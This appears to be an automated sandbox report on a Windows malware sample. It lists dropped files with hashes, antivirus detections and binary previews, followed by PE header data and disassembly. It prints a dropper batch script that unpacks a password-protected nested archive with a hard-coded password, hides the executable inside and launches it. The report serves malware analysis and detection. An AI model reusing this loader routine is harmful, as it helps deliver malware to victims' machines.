                                                                                                                                                                                                                                                Preview:PK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}.
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1800210
                                                                                                                                                                                                                                                Entropy (8bit):7.997720745184939
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:49152:ayj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJw:Pj13Trb6i5iGmuXZTbBizt0JhG
                                                                                                                                                                                                                                                MD5:B7D1E04629BEC112923446FDA5391731
                                                                                                                                                                                                                                                SHA1:814055286F963DDAA5BF3019821CB8A565B56CB8
                                                                                                                                                                                                                                                SHA-256:4DA77D4EE30AD0CD56CD620F4E9DC4016244ACE015C5B4B43F8F37DD8E3A8789
                                                                                                                                                                                                                                                SHA-512:79FC3606B0FE6A1E31A2ECACC96623CAF236BF2BE692DADAB6EA8FFA4AF4231D782094A63B76631068364AC9B6A872B02F1E080636EBA40ED019C2949A8E28DB
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:PK........n..Yab..xw..xw......file_4.zipPK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z..
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1800364
                                                                                                                                                                                                                                                Entropy (8bit):7.997716835838842
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:49152:kyj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJv:lj13Trb6i5iGmuXZTbBizt0Jht
                                                                                                                                                                                                                                                MD5:0DC4014FACF82AA027904C1BE1D403C1
                                                                                                                                                                                                                                                SHA1:5E6D6C020BFC2E6F24F3D237946B0103FE9B1831
                                                                                                                                                                                                                                                SHA-256:A29DDD29958C64E0AF1A848409E97401307277BB6F11777B1CFB0404A6226DE7
                                                                                                                                                                                                                                                SHA-512:CBEEAD189918657CC81E844ED9673EE8F743AED29AD9948E90AFDFBECACC9C764FBDBFB92E8C8CEB5AE47CEE52E833E386A304DB0572C7130D1A54FD9C2CC028
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:PK........n..Y..+..x...x......file_5.zipPK........n..Yab..xw..xw......file_4.zipPK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3473559
                                                                                                                                                                                                                                                Entropy (8bit):7.9992359395959935
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:98304:8aR3D0Ae5mwdkDWm1Xo4j13Trb6i5iGmuXZTbBizt0Jhd:ds5m6sXoArb6iguZnBi5Qd
                                                                                                                                                                                                                                                MD5:CEA368FC334A9AEC1ECFF4B15612E5B0
                                                                                                                                                                                                                                                SHA1:493D23F72731BB570D904014FFDACBBA2334CE26
                                                                                                                                                                                                                                                SHA-256:07E38CAD68B0CDBEA62F55F9BC6EE80545C2E1A39983BAA222E8AF788F028541
                                                                                                                                                                                                                                                SHA-512:BED35A1CC56F32E0109EA5A02578489682A990B5CEFA58D7CF778815254AF9849E731031E824ADBA07C86C8425DF58A1967AC84CE004C62E316A2E51A75C8748
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:PK........n..Y`.T......#.....AntiAV.data..E..@.D..C/qwg..;...mG.3H..|...$..}.`..8......lV1*..4...Cu.H.(l+{Cl.:........$+Nr....\.u.K_1N:k.'....F...... .....+.70..R.>..A..#6L.:..n..7......Y..y......v.,....=...e....fe.4.@...h..+....=.#...T....*..A..|...{A.p{.b*.|.[...Q...z.v.....iD.....W.....;...........YVL._._.F..4./g;syC.....e,.N..>t.43..p.T4?.K.....:Z.XDVS.gj.)cp..A9.7^.d.M.d.j..c:.(T<J._3-..8.,."s.'...B\.q...\..e.!..{l.\.]'.P.2}..l@^.G...{n..p..u.n.1;W..#..p.A.YD7.....,.o..z;.6T../.w..=.3K5..]............U...,r....n....(..I.....Q.o%.NF..Q.h$y.".7.tU..eVe.b.q.S4%"C..$g..iX..XQl..?Z.U.|.g....&.d..Y.|..5O...s.|..A..@.Y1F.o.o.s.'UY.AU#....D.K.....A....=t.M..L4...{.....BF.Rg.-...j..p.c..'.2....].m..w37t...Rn.r....v....W..g0E......)-.6.=v/.9...o..~.mh.U.&...5.ld4k.gG.G.S.w4G..]'.5......r..Q.U.U.9.Vv....2.>....p.s.p..e....(..}Jox.....Z..[Y..ku.....5....s.././....:...v......h.u.ZlG.>).,.(....Ye<.....3...:T:)...-).=.L.=.2F....&H7..j..\.B6.Ox.\....
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1827328
                                                                                                                                                                                                                                                Entropy (8bit):7.963282633529333
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:49152:2AVavyjrvfTYx9Z+tylUcecGjcM7B68ue7KhNzw:2AkvyvfTYxTUTj77B68uRe
                                                                                                                                                                                                                                                MD5:83D75087C9BF6E4F07C36E550731CCDE
                                                                                                                                                                                                                                                SHA1:D5FF596961CCE5F03F842CFD8F27DDE6F124E3AE
                                                                                                                                                                                                                                                SHA-256:46DB3164BEBFFC61C201FE1E086BFFE129DDFED575E6D839DDB4F9622963FB3F
                                                                                                                                                                                                                                                SHA-512:044E1F5507E92715CE9DF8BB802E83157237A2F96F39BAC3B6A444175F1160C4D82F41A0BCECF5FEAF1C919272ED7929BAEF929A8C3F07DEECEBC44B0435164A
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 70%
                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....Pg.........."...............-...H...-....@..............................I...........`...................................................H...............H...............H...............................H.(.....H.8...........................................UPX0......-.............................UPX1..........-.....................@...UPX2..........H.....................@...4.24.UPX!.$..=g.7....Z.H......zH.I..-.3..VH.. H......................1...MZ...o"uKHcQ<.<.PE.>H..8Q.6...[.J.t..lu'.yt.r!H....y........"....9.o.m.........1ZH....g.n.....l8..0..0..!.0..|..(.(,....8.u....'~....*../.. ^.....(v...w....YR....oD.i....H.D$ ~.9..FL......\..(..<..u....I..D.I...f.AWAVVWS.eN.%0g.....x.5.2.H..>...t.H..}.9.t)L..g..f.H....>....A..Q.u.=.X..........:|...oh.?.....^......;.]uzZ..{Q.s`AF..2PQd......p..B....o...t.1.=E6...'u7.p.)<Z.,(".f....Z..a..,+.GLO,v...\=^X...
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe
                                                                                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3473725
                                                                                                                                                                                                                                                Entropy (8bit):7.999948676888215
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:49152:9b8s3/pc44zfeVeY45ZADJE7ZdXrYX+RyWGGdVPLv7+joMMPlHxNwNrRPXD3tI:LP0eQz5Zwm7ZdEOhdLrK0l2FpI
                                                                                                                                                                                                                                                MD5:045B0A3D5BE6F10DDF19AE6D92DFDD70
                                                                                                                                                                                                                                                SHA1:0387715B6681D7097D372CD0005B664F76C933C7
                                                                                                                                                                                                                                                SHA-256:94B392E94FA47D1B9B7AE6A29527727268CC2E3484E818C23608F8835BC1104D
                                                                                                                                                                                                                                                SHA-512:58255A755531791B888FFD9B663CC678C63D5CAA932260E9546B1B10A8D54208334725C14529116B067BCF5A5E02DA85E015A3BED80092B7698A43DAB0168C7B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:PK........n..Yd=,..5...5.....file_7.zipm..+]..E....`...._..'.....DXW|._6.Kau^.O....W.0.....fE....Q:.t`9.9"..c.... .[(2..[m{.`S.?8...w.v.{zo/a....E..L.1..<.....].@.....:...3?. k.5....H.=......0.A.,3p......_R.......[.7....j.Ba$v1AO.@q....x...u..9.k..z.p...5.....-(.b...y.........S.../..l.Q.....)....w..@...w;.;2.&Q.w.....Hn.3A.z.i..0i%A..E-7.....8....(.Z.A....k.......=.g.,......N.Yt`....)....T.....f..P.....u4ig.......B...~-7...Y]Ct.6.7..PS.Su7yx8...#.......B.3.f."....x.-u.....M.%.a.._\D.5.G....O.P....,b.;=.k[....4......SdS....gL.....X.......G...f.P....p.PS.~.P.}...X.7.+Ap.-.....^'..\.6..r.2.p.wd...dd....(..S..N..#.M....~..L..sjX...,..B.........-..R..~..A..B...MF..,.z.........lK.]<"..,...K.~..S.Z...p).......z..I..E.MG.M].....F.SY.p..1...sM7...B...l......g..V...q..p}$%iM....L...N...;.......}/Y8..&zAO&0..s.{.pR.A...Y`..Q.../n..,........z.&.k.`TU...7lv.xQ@~.'..H.S..y...n48......m....s1(.`.....,.n;j...CX.s..sN.L..q.u.G.....q.M..:..xI":Y.
                                                                                                                                                                                                                                                Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3473725
                                                                                                                                                                                                                                                Entropy (8bit):7.999948676888215
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:49152:9b8s3/pc44zfeVeY45ZADJE7ZdXrYX+RyWGGdVPLv7+joMMPlHxNwNrRPXD3tI:LP0eQz5Zwm7ZdEOhdLrK0l2FpI
                                                                                                                                                                                                                                                MD5:045B0A3D5BE6F10DDF19AE6D92DFDD70
                                                                                                                                                                                                                                                SHA1:0387715B6681D7097D372CD0005B664F76C933C7
                                                                                                                                                                                                                                                SHA-256:94B392E94FA47D1B9B7AE6A29527727268CC2E3484E818C23608F8835BC1104D
                                                                                                                                                                                                                                                SHA-512:58255A755531791B888FFD9B663CC678C63D5CAA932260E9546B1B10A8D54208334725C14529116B067BCF5A5E02DA85E015A3BED80092B7698A43DAB0168C7B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:PK........n..Yd=,..5...5.....file_7.zipm..+]..E....`...._..'.....DXW|._6.Kau^.O....W.0.....fE....Q:.t`9.9"..c.... .[(2..[m{.`S.?8...w.v.{zo/a....E..L.1..<.....].@.....:...3?. k.5....H.=......0.A.,3p......_R.......[.7....j.Ba$v1AO.@q....x...u..9.k..z.p...5.....-(.b...y.........S.../..l.Q.....)....w..@...w;.;2.&Q.w.....Hn.3A.z.i..0i%A..E-7.....8....(.Z.A....k.......=.g.,......N.Yt`....)....T.....f..P.....u4ig.......B...~-7...Y]Ct.6.7..PS.Su7yx8...#.......B.3.f."....x.-u.....M.%.a.._\D.5.G....O.P....,b.;=.k[....4......SdS....gL.....X.......G...f.P....p.PS.~.P.}...X.7.+Ap.-.....^'..\.6..r.2.p.wd...dd....(..S..N..#.M....~..L..sjX...,..B.........-..R..~..A..B...MF..,.z.........lK.]<"..,...K.~..S.Z...p).......z..I..E.MG.M].....F.SY.p..1...sM7...B...l......g..V...q..p}$%iM....L...N...;.......}/Y8..&zAO&0..s.{.pR.A...Y`..Q.../n..,........z.&.k.`TU...7lv.xQ@~.'..H.S..y...n48......m....s1(.`.....,.n;j...CX.s..sN.L..q.u.G.....q.M..:..xI":Y.
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe
                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):440
                                                                                                                                                                                                                                                Entropy (8bit):5.0791308599041844
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:QUp+CF16g64CTFMj2LIQLvDHW7PCVGrMLvmuCogLKO8NerxVv:QUpNF16g632CkezWDCVGYTOLv8k7
                                                                                                                                                                                                                                                MD5:3626532127E3066DF98E34C3D56A1869
                                                                                                                                                                                                                                                SHA1:5FA7102F02615AFDE4EFD4ED091744E842C63F78
                                                                                                                                                                                                                                                SHA-256:2A0E18EF585DB0802269B8C1DDCCB95CE4C0BAC747E207EE6131DEE989788BCA
                                                                                                                                                                                                                                                SHA-512:DCCE66D6E24D5A4A352874144871CD73C327E04C1B50764399457D8D70A9515F5BC0A650232763BF34D4830BAB70EE4539646E7625CFE5336A870E311043B2BD
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:..&cls..@echo off..mode 65,10..title g3g34g34g34g43 (34g34g45h6hj56j56j)..md extracted..ren file.bin file.zip..call 7z.exe e file.zip -p24291711423417250691697322505 -oextracted ..for /l %%i in (7,-1,1) do (..call 7z.exe e extracted/file_%%i.zip -oextracted..)..ren file.zip file.bin..cd extracted..move "in.exe" ../..cd....rd /s /q extracted..attrib +H "in.exe"..start "" "in.exe"..cls..echo Launched 'in.exe'...pause..del /f /q "in.exe"..
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\main\in.exe
                                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1827328
                                                                                                                                                                                                                                                Entropy (8bit):7.963282633529333
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:49152:2AVavyjrvfTYx9Z+tylUcecGjcM7B68ue7KhNzw:2AkvyvfTYxTUTj77B68uRe
                                                                                                                                                                                                                                                MD5:83D75087C9BF6E4F07C36E550731CCDE
                                                                                                                                                                                                                                                SHA1:D5FF596961CCE5F03F842CFD8F27DDE6F124E3AE
                                                                                                                                                                                                                                                SHA-256:46DB3164BEBFFC61C201FE1E086BFFE129DDFED575E6D839DDB4F9622963FB3F
                                                                                                                                                                                                                                                SHA-512:044E1F5507E92715CE9DF8BB802E83157237A2F96F39BAC3B6A444175F1160C4D82F41A0BCECF5FEAF1C919272ED7929BAEF929A8C3F07DEECEBC44B0435164A
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 70%
                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....Pg.........."...............-...H...-....@..............................I...........`...................................................H...............H...............H...............................H.(.....H.8...........................................UPX0......-.............................UPX1..........-.....................@...UPX2..........H.....................@...4.24.UPX!.$..=g.7....Z.H......zH.I..-.3..VH.. H......................1...MZ...o"uKHcQ<.<.PE.>H..8Q.6...[.J.t..lu'.yt.r!H....y........"....9.o.m.........1ZH....g.n.....l8..0..0..!.0..|..(.(,....8.u....'~....*../.. ^.....(v...w....YR....oD.i....H.D$ ~.9..FL......\..(..<..u....I..D.I...f.AWAVVWS.eN.%0g.....x.5.2.H..>...t.H..}.9.t)L..g..f.H....>....A..Q.u.=.X..........:|...oh.?.....^......;.]uzZ..{Q.s`AF..2PQd......p..B....o...t.1.=E6...'u7.p.)<Z.,(".f....Z..a..,+.GLO,v...\=^X...
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):302
                                                                                                                                                                                                                                                Entropy (8bit):3.4367726114504857
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:zFpmFbXUhXUEZ+lX1CGdKUe6tE9+AQy0l7Et0:xpmFr4Q1CGAFD9+nVgt0
                                                                                                                                                                                                                                                MD5:8AA6C5F2360E04EB0C4542A342E80BB6
                                                                                                                                                                                                                                                SHA1:28122382464ECBF8E3FEABE64E64180EB66B80D7
                                                                                                                                                                                                                                                SHA-256:B981131EEC09EAE7E008A59E163313D1D661BFD369F6ADB37A247E03EDB72A2C
                                                                                                                                                                                                                                                SHA-512:393C1950EFB47BEEE95751EC9B15A2FD389E4AD6BA98757E49D1D4D9A7A962C118A83A3B13D5C9CF9E745DB20F2D4654E4ABC4362F1DCD811BCFB39B4EF7CCC8
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.....a..t7H......c.F.......<... .....s.......... ....................;.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0...................@3P.........................
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):350
                                                                                                                                                                                                                                                Entropy (8bit):5.0682682106683945
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:AMMyS3pt+uoQcAxXF2SaioBQypHSTgqF1AivwtHgNmtQFfpap1tNjtv:pMpDh5RwXSTgqFyYwzuJA1tNp
                                                                                                                                                                                                                                                MD5:2F644B7E25627553C5731B735473C859
                                                                                                                                                                                                                                                SHA1:5A3C2158A1FCF27AE6807A8079894FFE8D33FBEA
                                                                                                                                                                                                                                                SHA-256:2B34B0DE62F49C19D1F9A004AD698E2612F7FCD5072F5C9834621C62F15FB55F
                                                                                                                                                                                                                                                SHA-512:E83CA818C9785EB3A0297E65F08E22DC9E29A368BCADC9887B64EC746C88B79ACBAD20B4B6D49C07CB819ACE21B00C2BEB083F18A0CD5528D2BD00A7B0C4E802
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:..7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21....Scanning the drive for archives:.. 0M Scan. .1 file, 1799594 bytes (1758 KiB)....Extracting archive: extracted\file_1.zip..--..Path = extracted\file_1.zip..Type = zip..Physical Size = 1799594.... 0%. .Everything is Ok....Size: 1827328..Compressed: 1799594..
                                                                                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Entropy (8bit):6.5380962224606805
                                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                File name:file.exe
                                                                                                                                                                                                                                                File size:3'047'936 bytes
                                                                                                                                                                                                                                                MD5:99a7a8ab2463dd70f90e0ab4e0aec4a8
                                                                                                                                                                                                                                                SHA1:b9e2b99b7124d83df3b7cd052231cb35d1d6efcb
                                                                                                                                                                                                                                                SHA256:89601168c7196328f763faf4dd415b041c94f6d5fe5c2b7094d49dba69926a61
                                                                                                                                                                                                                                                SHA512:8e775104cc32b5426fbfe170632ca36949e66701a52b83fd8378b4eca239f928094dfca10ba9ae363c8aaad59f863260427fc5449ea7ca0e22ddda4256326e55
                                                                                                                                                                                                                                                SSDEEP:49152:rXbVHNeIAyjLGBiZQo42rhxAZimUH0wH6faFgmiCk/uIL:rzxXnGBiZQo42rhxAZi0wHymU
                                                                                                                                                                                                                                                TLSH:4EE56CA1F508B2CBD4AE53388C27DD8269AD07B90B1449D7F86C74BDBDA3DC522B5C24
                                                                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................
                                                                                                                                                                                                                                                Icon Hash:00928e8e8686b000
                                                                                                                                                                                                                                                Entrypoint:0x723000
                                                                                                                                                                                                                                                Entrypoint Section:.taggant
                                                                                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                Time Stamp:0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
                                                                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                                                OS Version Major:6
                                                                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                                                                File Version Major:6
                                                                                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                                                                                Subsystem Version Major:6
                                                                                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                                                                                Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                                                jmp 00007F69696A745Ah
                                                                                                                                                                                                                                                punpcklbw mm5, qword ptr [esi]
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add cl, ch
                                                                                                                                                                                                                                                add byte ptr [eax], ah
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [ecx], al
                                                                                                                                                                                                                                                or al, byte ptr [eax]
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], dh
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [ecx], al
                                                                                                                                                                                                                                                or al, byte ptr [eax]
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
